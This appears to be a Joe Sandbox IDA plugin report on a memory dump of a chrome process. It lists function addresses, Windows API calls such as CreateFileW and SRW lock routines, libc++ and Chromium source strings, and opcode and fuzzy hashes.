Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:368: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$ProcessPrng$bcryptprimitives.dll
API String ID: 2574300362-3291573388
Opcode ID: 65123a38714a84464c80ae905ecb90bca6ea1113ffecb9f5a8c62a1e1695cf81
Instruction ID: 9031d87274340b0fe2e9134de14761d5dd213da789ec4c8e86b8544cbd1b169d
Opcode Fuzzy Hash: 65123a38714a84464c80ae905ecb90bca6ea1113ffecb9f5a8c62a1e1695cf81
Instruction Fuzzy Hash: 5C518F61B0DA6695EE24BB15E8542B96351EB12FA4F844632DD2D863E1EF3CFC46C308

Function 00007FF645806E80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF645806F12
GetCurrentDirectoryW.KERNEL32 ref: 00007FF645806F4A
GetModuleFileNameW.KERNEL32 ref: 00007FF645806F94
CreateFileW.KERNEL32 ref: 00007FF6458070B7

Strings

debug.log, xrefs: 00007FF645806FD6, 00007FF64580706E

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: File$Create$CurrentDirectoryModuleName
String ID: debug.log
API String ID: 4120427848-600467936
Opcode ID: cc94403bba8ab4aaf74ab0589441cdb1841fba469a065eff5abc881bdcc3b7fb
Instruction ID: b1687a5d0d641a0030caabbd4317dd4be716abcf621b989000d18d6713d78245
Opcode Fuzzy Hash: cc94403bba8ab4aaf74ab0589441cdb1841fba469a065eff5abc881bdcc3b7fb
Instruction Fuzzy Hash: FA51BCB1A0DA6689FB20BB16EA4437922A1EF81F94F104236DA5D877E1DF7DE9458300

Function 00007FF6456816D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF6456816FE
AcquireSRWLockExclusive.KERNEL32 ref: 00007FF64568181B
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF645681841
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF645681860

Strings

..\..\third_party\libc++\src\include\array:234: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>, xrefs: 00007FF64568180C

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release
String ID: ..\..\third_party\libc++\src\include\array:234: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>
API String ID: 1678258262-2696940747
Opcode ID: ee6e2f276654c37aa09745c40e87c15c73998335483e48628210d39002c2e087
Instruction ID: 4602904fc806dd38567d226af2776f164ddfd0b4bbd89afcfb8f42d26beb9923
Opcode Fuzzy Hash: ee6e2f276654c37aa09745c40e87c15c73998335483e48628210d39002c2e087
Instruction Fuzzy Hash: 1E41D422B0FA5295FE55BB2199146BC67A0FB86F80F444439DE0E873A1DF3CAC96D701

Function 00007FF6456A21F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6456A2040), ref: 00007FF6456A224D
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6456A2040), ref: 00007FF6456A2284
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6456A2040), ref: 00007FF6456A235C

Strings

..\..\base\threading\thread.cc, xrefs: 00007FF6456A22F2
StopSoon, xrefs: 00007FF6456A22EB

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release
String ID: ..\..\base\threading\thread.cc$StopSoon
API String ID: 1678258262-4240870308
Opcode ID: adae8eaed9c8f3929d972e6dbba24974bb844d98e2392a8842137ea4cacb6c1d
Instruction ID: feaedb41700a9d19a936903a60433c8af212edd3e33d0d27e3bc35f92f5129b4
Opcode Fuzzy Hash: adae8eaed9c8f3929d972e6dbba24974bb844d98e2392a8842137ea4cacb6c1d
Instruction Fuzzy Hash: 58415831B0DB6685EA14BB15E9502AD73A4FB4AF94F984032DA0D877A8DF3CED46C340

Function 00007FF6457BE4F4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6457BE519
GetProcAddress.KERNEL32 ref: 00007FF6457BE52F
FreeLibrary.KERNEL32 ref: 00007FF6457BE556

Strings

mscoree.dll, xrefs: 00007FF6457BE510
CorExitProcess, xrefs: 00007FF6457BE528

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3d8f831ad9830d2732d543ec9a9fb229a8571fde764722e4756b6d07d78c1cc4
Instruction ID: 56287f5d8fc632e3c85d46ba5a44782a41cd7f526edc7c27fb57f3f35cb319bb
Opcode Fuzzy Hash: 3d8f831ad9830d2732d543ec9a9fb229a8571fde764722e4756b6d07d78c1cc4
Instruction Fuzzy Hash: 7BF0CD61B1DA0281EE10BB28E8453396360EF88F64F980235DA6E8A6F4DF2CDD448300

Function 00007FF64568AC50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FF64568ACB8
GetProcAddress.KERNEL32 ref: 00007FF64568ACCD

Strings

ProcessPrng, xrefs: 00007FF64568ACC3
bcryptprimitives.dll, xrefs: 00007FF64568ACB1

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ProcessPrng$bcryptprimitives.dll
API String ID: 2574300362-2667675608
Opcode ID: c3a113c6457ebe76e4fea8f36af787d4822eb4a85e01334098769ee2bae2c045
Instruction ID: bbaa9b59d4de75fb6dcea027344d4795552ab4d9f7079d55df81ea6d2cccc490
Opcode Fuzzy Hash: c3a113c6457ebe76e4fea8f36af787d4822eb4a85e01334098769ee2bae2c045
Instruction Fuzzy Hash: CB418261A0DA5296FA11BB25E8412B96360FF86F90F444131DE4C877A5EF3CED86C701

Function 00007FF6456EC1E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6456EC28C

Strings

ScopedBlockingCall, xrefs: 00007FF6456EC348
GetCurrentDirectoryW, xrefs: 00007FF6456EC21C
..\..\base\files\file_util_win.cc, xrefs: 00007FF6456EC223

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: CurrentDirectory
String ID: ..\..\base\files\file_util_win.cc$GetCurrentDirectoryW$ScopedBlockingCall
API String ID: 1611563598-3482229333
Opcode ID: fcab5a81ee8bff8e98b0a11fd3fd3c6aec3cb95b2c817cfb2fc15e9724453b3a
Instruction ID: 8ca1166c14816e8c59e261a07b38b1e9bd6503c724ee5df25f756120f129f067
Opcode Fuzzy Hash: fcab5a81ee8bff8e98b0a11fd3fd3c6aec3cb95b2c817cfb2fc15e9724453b3a
Instruction Fuzzy Hash: E0418122A1CB8691FB21BF25E8547EA7760FF81B84F445031EA8D476A5DF3CE985C701

Function 00007FF64568FD50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF64568FD64
GetModuleHandleW.KERNEL32 ref: 00007FF64568FDD9
GetProcAddress.KERNEL32 ref: 00007FF64568FDE9

Strings

GetHandleVerifier, xrefs: 00007FF64568FDDF

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GetHandleVerifier
API String ID: 4275029093-1090674830
Opcode ID: 14c04637d36a46182b46355d9e388197b0da94b569f1c2c093a343e92ee38453
Instruction ID: f96c7155ff1becca2fd36de91bf7f46c9cc9adfd85ea3e04fd6f3bdf1b1b1886
Opcode Fuzzy Hash: 14c04637d36a46182b46355d9e388197b0da94b569f1c2c093a343e92ee38453
Instruction Fuzzy Hash: 92216D31A0EA1381EA25BB25A8542786251BF46F90F448439CA0EC67E0DF7CAC96E301

Function 00007FF6456A0550 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF6456A0562
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF6456A05E9

Strings

bitset test argument out of range, xrefs: 00007FF6456A05FF
bitset set argument out of range, xrefs: 00007FF6456A060B

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: bitset set argument out of range$bitset test argument out of range
API String ID: 17069307-1976194836
Opcode ID: e7f49c46d4a3a9ee38ae16bad91eb18d31e28c1e0615a3d34aad16d1fd0c2494
Instruction ID: d8491971aed50a42a80aab14b3b44afe5ddb78537c282407868c5983c8afacec
Opcode Fuzzy Hash: e7f49c46d4a3a9ee38ae16bad91eb18d31e28c1e0615a3d34aad16d1fd0c2494
Instruction Fuzzy Hash: B611C151B0C66A82FD14BA12EB583B96313AF42FE0F409030C94E876A5DD2CFCC69304

Function 00007FF6456C4150 Relevance: 6.3, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6456C419F
SetLastError.KERNEL32 ref: 00007FF6456C41B4
GetLastError.KERNEL32 ref: 00007FF6456C41D4
SetLastError.KERNEL32 ref: 00007FF6456C41E6
GetLastError.KERNEL32 ref: 00007FF6456C4218

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 79a07a6fcbdbd1bffff7d87952e3264a3ed99b75aa4ba779420d016a46218e4b
Instruction ID: efae04bd3973f01c7c7b3ac39b70719e6134159e2ca6020f6e18668281a57780
Opcode Fuzzy Hash: 79a07a6fcbdbd1bffff7d87952e3264a3ed99b75aa4ba779420d016a46218e4b
Instruction Fuzzy Hash: 7A219531A0C54245EE61BB60A8557B922D06F94F76F584230DEAE83AE4DF3CEC459200

Function 00007FF645731D20 Relevance: 6.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,00000001,000000C0,00007FF645731C81), ref: 00007FF645731D5A
AcquireSRWLockExclusive.KERNEL32(?,00000001,000000C0,00007FF645731C81), ref: 00007FF645731E48
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF6457E587D

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: AcquireExclusiveLock
String ID:
API String ID: 4021432409-0
Opcode ID: 44c5e20faccbea71cacc84ea3090f7a4a129abb64d4d634bef74db1b70222435
Instruction ID: 746aadd391fa9feb18ded6bf7b6438f0e66d5c9cd487a1a5c9e537bc13ba5ccc
Opcode Fuzzy Hash: 44c5e20faccbea71cacc84ea3090f7a4a129abb64d4d634bef74db1b70222435
Instruction Fuzzy Hash: 4D51A022B0DA2685EE24BF16E4401B92760FB88FE5F558032DE0E877A4DE3DDC86C744

Function 00007FF645681870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF645681891
AcquireSRWLockExclusive.KERNEL32 ref: 00007FF645681944

Strings

..\..\third_party\libc++\src\include\array:234: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>, xrefs: 00007FF645681935

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: AcquireExclusiveLock
String ID: ..\..\third_party\libc++\src\include\array:234: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>
API String ID: 4021432409-2696940747
Opcode ID: 3f0b879406dd71d9b7e4677304ff48be8ddae573981dce2af592c241fdab1611
Instruction ID: c62bc6ffd6fb6ad4d236f1451146d2e225910fae60993fbd6463a921de6785ae
Opcode Fuzzy Hash: 3f0b879406dd71d9b7e4677304ff48be8ddae573981dce2af592c241fdab1611
Instruction Fuzzy Hash: 6F21D861F0F29651FD65BB26554057C1BA0AF57F88F144032CE2D936B19E3CAD52A702

Function 00007FF6457AD97C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(00007FF6457ACB47,?,?,?,?,00007FF6457AAA6B), ref: 00007FF6457AD9CC
RaiseException.KERNEL32(00007FF6457ACB47,?,?,?,?,00007FF6457AAA6B), ref: 00007FF6457ADA0D

Strings

csm, xrefs: 00007FF6457AD9FA

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0f7bd9916902249b5c99215e7065480f8df65aacb9190a0386ba75daa210fbc3
Instruction ID: 05de0c103fe7f3ee81803eaf8d8dc16e56a378062a8375179e222c09462f8093
Opcode Fuzzy Hash: 0f7bd9916902249b5c99215e7065480f8df65aacb9190a0386ba75daa210fbc3
Instruction Fuzzy Hash: 5C112B3261CB4192EB21AB15F444269B7E5FB88F94F588234EA8D47758EF7CDD518B00

Function 00007FF6456B76A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6456B76EF
GetProcAddress.KERNEL32 ref: 00007FF6456B76FF

Strings

GetHandleVerifier, xrefs: 00007FF6456B76F5

Memory Dump Source

